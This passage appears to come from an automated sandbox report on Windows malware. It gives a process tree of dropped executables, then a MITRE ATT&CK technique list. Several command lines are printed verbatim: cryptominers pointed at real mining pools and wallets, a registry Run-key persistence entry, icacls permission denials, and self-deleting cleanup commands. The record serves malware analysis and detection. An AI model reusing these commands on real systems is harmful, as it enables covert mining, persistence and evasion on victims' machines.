        PID:8452
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        11⤵
        Kills process with taskkill
        
        PID:6380
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"
        9⤵
        
        PID:7716
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        10⤵
        
        PID:8396
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        11⤵
        
        PID:7276
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
        9⤵
        
        PID:7176
        
        C:\Users\Admin\AppData\Roaming\BA69.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\BA69.tmp.exe"
        10⤵
        
        PID:8872
        
        C:\Users\Admin\AppData\Roaming\BA69.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\BA69.tmp.exe"
        11⤵
        
        PID:7496
        
        C:\Users\Admin\AppData\Roaming\DB51.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\DB51.tmp.exe"
        10⤵
        
        PID:8200
        
        C:\Users\Admin\AppData\Roaming\D072.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\D072.tmp.exe"
        10⤵
        
        PID:7888
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        11⤵
        
        PID:8432
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        11⤵
        
        PID:6684
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
        10⤵
        
        PID:7124
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        11⤵
        Runs ping.exe
        
        PID:8692
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"
        9⤵
        
        PID:9156
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\egetum5d.bes\f7c5e026.exe & exit
        7⤵
        
        PID:6460
        
        C:\Users\Admin\AppData\Local\Temp\egetum5d.bes\f7c5e026.exe
        
        C:\Users\Admin\AppData\Local\Temp\egetum5d.bes\f7c5e026.exe
        8⤵
        
        PID:8616
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eykxa0f3.3og\app.exe /8-2222 & exit
        7⤵
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\eykxa0f3.3og\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\eykxa0f3.3og\app.exe /8-2222
        8⤵
        
        PID:8828
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eib13cup.lun\Four.exe & exit
        7⤵
        
        PID:5448
        
        C:\Users\Admin\AppData\Local\Temp\eib13cup.lun\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\eib13cup.lun\Four.exe
        8⤵
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\R682D9QAVD\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\R682D9QAVD\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        9⤵
        
        PID:8772
        
        C:\Users\Admin\AppData\Local\Temp\R682D9QAVD\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\R682D9QAVD\multitimer.exe" 1 3.1617448253.60684d3da2175 104
        10⤵
        
        PID:8792
        
        C:\Users\Admin\AppData\Local\Temp\R682D9QAVD\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\R682D9QAVD\multitimer.exe" 2 3.1617448253.60684d3da2175
        11⤵
        
        PID:7896
        
        C:\Users\Admin\AppData\Local\Temp\k1vblfizxf1\50fpwj145k1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\k1vblfizxf1\50fpwj145k1.exe" /ustwo INSTALL
        12⤵
        
        PID:8516
        
        C:\Users\Admin\AppData\Local\Temp\tfh1cefkibl\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tfh1cefkibl\cpyrix.exe" /VERYSILENT
        12⤵
        
        PID:7396
        
        C:\Users\Admin\AppData\Local\Temp\vacgtztqapl\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vacgtztqapl\app.exe" /8-23
        12⤵
        
        PID:7300
        
        C:\Users\Admin\AppData\Local\Temp\mfbwclw343t\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mfbwclw343t\vict.exe" /VERYSILENT /id=535
        12⤵
        
        PID:4252
        
        C:\Users\Admin\AppData\Local\Temp\2g0k3ynipl5\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2g0k3ynipl5\Setup3310.exe" /Verysilent /subid=577
        12⤵
        
        PID:5048
        
        C:\Users\Admin\AppData\Local\Temp\F0UGCGM81W\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\F0UGCGM81W\setups.exe" ll
        9⤵
        
        PID:9004
        
        C:\Users\Admin\AppData\Local\Temp\is-EANBP.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-EANBP.tmp\setups.tmp" /SL5="$10794,635399,250368,C:\Users\Admin\AppData\Local\Temp\F0UGCGM81W\setups.exe" ll
        10⤵
        
        PID:7268
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
    3⤵
    PID:5436
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
      4⤵
      Checks whether UAC is enabled
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:4348
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
        5⤵
        
        PID:1540
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
    3⤵
    PID:5464
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
      4⤵
      PID:5308
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        5⤵
        
        PID:4608
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
    3⤵
    PID:4864
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"
    3⤵
    PID:5600
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      4⤵
      PID:3768
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
    3⤵
    PID:5580
  - - C:\Users\Admin\AppData\Local\Temp\VN82WVC7NE\multitimer.exe
      "C:\Users\Admin\AppData\Local\Temp\VN82WVC7NE\multitimer.exe" 0 306065bb10421b26.04333812 0 103
      4⤵
      PID:5108
    - - C:\Users\Admin\AppData\Local\Temp\VN82WVC7NE\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VN82WVC7NE\multitimer.exe" 1 3.1617447991.60684c3706a54 103
        5⤵
        
        PID:4888
      - C:\Users\Admin\AppData\Local\Temp\VN82WVC7NE\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VN82WVC7NE\multitimer.exe" 2 3.1617447991.60684c3706a54
        6⤵
        
        PID:5700
        
        C:\Users\Admin\AppData\Local\Temp\sia03y34lch\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sia03y34lch\app.exe" /8-23
        7⤵
        
        PID:6660
        
        C:\Users\Admin\AppData\Local\Temp\ephdkeokdsf\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ephdkeokdsf\vict.exe" /VERYSILENT /id=535
        7⤵
        
        PID:6652
        
        C:\Users\Admin\AppData\Local\Temp\is-HO3LV.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HO3LV.tmp\vict.tmp" /SL5="$10474,870426,780800,C:\Users\Admin\AppData\Local\Temp\ephdkeokdsf\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:6868
        
        C:\Users\Admin\AppData\Local\Temp\is-B8DV6.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-B8DV6.tmp\win1host.exe" 535
        9⤵
        
        PID:2252
        
        C:\Users\Admin\AppData\Local\Temp\1dqvwjbmrfa\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1dqvwjbmrfa\Setup3310.exe" /Verysilent /subid=577
        7⤵
        
        PID:6644
        
        C:\Users\Admin\AppData\Local\Temp\is-C23B3.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-C23B3.tmp\Setup3310.tmp" /SL5="$2046C,138429,56832,C:\Users\Admin\AppData\Local\Temp\1dqvwjbmrfa\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:6836
        
        C:\Users\Admin\AppData\Local\Temp\is-CBBBG.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-CBBBG.tmp\Setup.exe" /Verysilent
        9⤵
        
        PID:7568
        
        C:\Users\Admin\AppData\Local\Temp\fv3cwzra2zl\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fv3cwzra2zl\cpyrix.exe" /VERYSILENT
        7⤵
        
        PID:6896
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        8⤵
        
        PID:7860
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        9⤵
        
        PID:8100
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        9⤵
        
        PID:7412
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        10⤵
        
        PID:7828
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        8⤵
        
        PID:8028
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        9⤵
        
        PID:8036
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        9⤵
        
        PID:8112
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        9⤵
        
        PID:8148
        
        C:\Users\Admin\AppData\Local\Temp\44xeuekmlrh\kfep5dawbvj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\44xeuekmlrh\kfep5dawbvj.exe" /ustwo INSTALL
        7⤵
        
        PID:6964
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "kfep5dawbvj.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\44xeuekmlrh\kfep5dawbvj.exe" & exit
        8⤵
        
        PID:7288
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "kfep5dawbvj.exe" /f
        9⤵
        Kills process with taskkill
        
        PID:7040
        
        C:\Users\Admin\AppData\Local\Temp\kgfxdhj5yuw\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kgfxdhj5yuw\vpn.exe" /silent /subid=482
        7⤵
        
        PID:7156
        
        C:\Users\Admin\AppData\Local\Temp\is-F7NP5.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-F7NP5.tmp\vpn.tmp" /SL5="$6034C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\kgfxdhj5yuw\vpn.exe" /silent /subid=482
        8⤵
        
        PID:5200
  - - C:\Users\Admin\AppData\Local\Temp\MEDNPC88UH\setups.exe
      "C:\Users\Admin\AppData\Local\Temp\MEDNPC88UH\setups.exe" ll
      4⤵
      PID:1816
    - - C:\Users\Admin\AppData\Local\Temp\is-N4BVK.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-N4BVK.tmp\setups.tmp" /SL5="$6035C,635399,250368,C:\Users\Admin\AppData\Local\Temp\MEDNPC88UH\setups.exe" ll
        5⤵
        
        PID:5788

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:2276
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 67F680AFDDB5272705BB20A1480653D4 C
  2⤵
  PID:5784
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 5D8C3F23D5D9E065DB329115F583C35B
  2⤵
  PID:6152
- C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
  "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
  2⤵
  PID:8432
- - C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
    3⤵
    PID:5244

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5540

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5460

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6792

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6988

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:4828
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{02b83993-e366-504c-80d0-b7703b3f0d36}\oemvista.inf" "9" "4d14a44ff" "000000000000017C" "WinSta0\Default" "0000000000000180" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:7824
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000170"
  2⤵
  PID:4620

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:5748

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:5292

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:5648
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:8760

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5204

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:1100

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4748

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7808

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7924

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3264

C:\Users\Admin\AppData\Local\Temp\FBCC.exe
C:\Users\Admin\AppData\Local\Temp\FBCC.exe
1⤵
PID:8380

C:\Users\Admin\AppData\Local\Temp\3DB.exe
C:\Users\Admin\AppData\Local\Temp\3DB.exe
1⤵
PID:8768

C:\Users\Admin\AppData\Local\Temp\43B4.exe
C:\Users\Admin\AppData\Local\Temp\43B4.exe
1⤵
PID:8552

C:\Users\Admin\AppData\Local\Temp\6595.exe
C:\Users\Admin\AppData\Local\Temp\6595.exe
1⤵
PID:4508
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "svrhost" /t REG_SZ /d "C:\Users\Admin\AppData\Local\svrhost.exe"
  2⤵
  PID:8348
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "svrhost" /t REG_SZ /d "C:\Users\Admin\AppData\Local\svrhost.exe"
    3⤵
    PID:8836
- C:\Users\Admin\AppData\Local\svrhost.exe
  "C:\Users\Admin\AppData\Local\svrhost.exe"
  2⤵
  PID:424

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8780

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8804

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6688

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4012

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7104

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8504

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8960

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:9084

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6972

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6040

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6328

C:\Users\Admin\AppData\Local\Temp\4D08.exe
C:\Users\Admin\AppData\Local\Temp\4D08.exe
1⤵
PID:4236
- C:\Windows\SysWOW64\icacls.exe
  icacls "C:\Users\Admin\AppData\Local\ac9d8f86-e895-49c8-bd76-c8068f737028" /deny *S-1-1-0:(OI)(CI)(DE,DC)
  2⤵
  - Modifies file permissions
  PID:7196
- C:\Users\Admin\AppData\Local\Temp\4D08.exe
  "C:\Users\Admin\AppData\Local\Temp\4D08.exe" --Admin IsNotAutoStart IsNotTask
  2⤵
  PID:8512
- - C:\Users\Admin\AppData\Local\6e6436cb-40fb-43c5-9dd8-b61bdf64e7ea\updatewin1.exe
    "C:\Users\Admin\AppData\Local\6e6436cb-40fb-43c5-9dd8-b61bdf64e7ea\updatewin1.exe"
    3⤵
    PID:9000
- - C:\Users\Admin\AppData\Local\6e6436cb-40fb-43c5-9dd8-b61bdf64e7ea\updatewin.exe
    "C:\Users\Admin\AppData\Local\6e6436cb-40fb-43c5-9dd8-b61bdf64e7ea\updatewin.exe"
    3⤵
    PID:9088
- - C:\Users\Admin\AppData\Local\6e6436cb-40fb-43c5-9dd8-b61bdf64e7ea\5.exe
    "C:\Users\Admin\AppData\Local\6e6436cb-40fb-43c5-9dd8-b61bdf64e7ea\5.exe"
    3⤵
    PID:8524
- - C:\Users\Admin\AppData\Local\6e6436cb-40fb-43c5-9dd8-b61bdf64e7ea\updatewin2.exe
    "C:\Users\Admin\AppData\Local\6e6436cb-40fb-43c5-9dd8-b61bdf64e7ea\updatewin2.exe"
    3⤵
    PID:8576

C:\Users\Admin\AppData\Local\Temp\7820.exe
C:\Users\Admin\AppData\Local\Temp\7820.exe
1⤵
PID:8128
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im 7820.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7820.exe" & del C:\ProgramData\*.dll & exit
  2⤵
  PID:9016
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im 7820.exe /f
    3⤵
    - Kills process with taskkill
    PID:7244

C:\Users\Admin\AppData\Local\Temp\93D7.exe
C:\Users\Admin\AppData\Local\Temp\93D7.exe
1⤵
PID:8472

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6788

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:4428

C:\Users\Admin\AppData\Local\Temp\53F.exe
C:\Users\Admin\AppData\Local\Temp\53F.exe
1⤵
PID:5492

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Software Discovery

T1518

System Information Discovery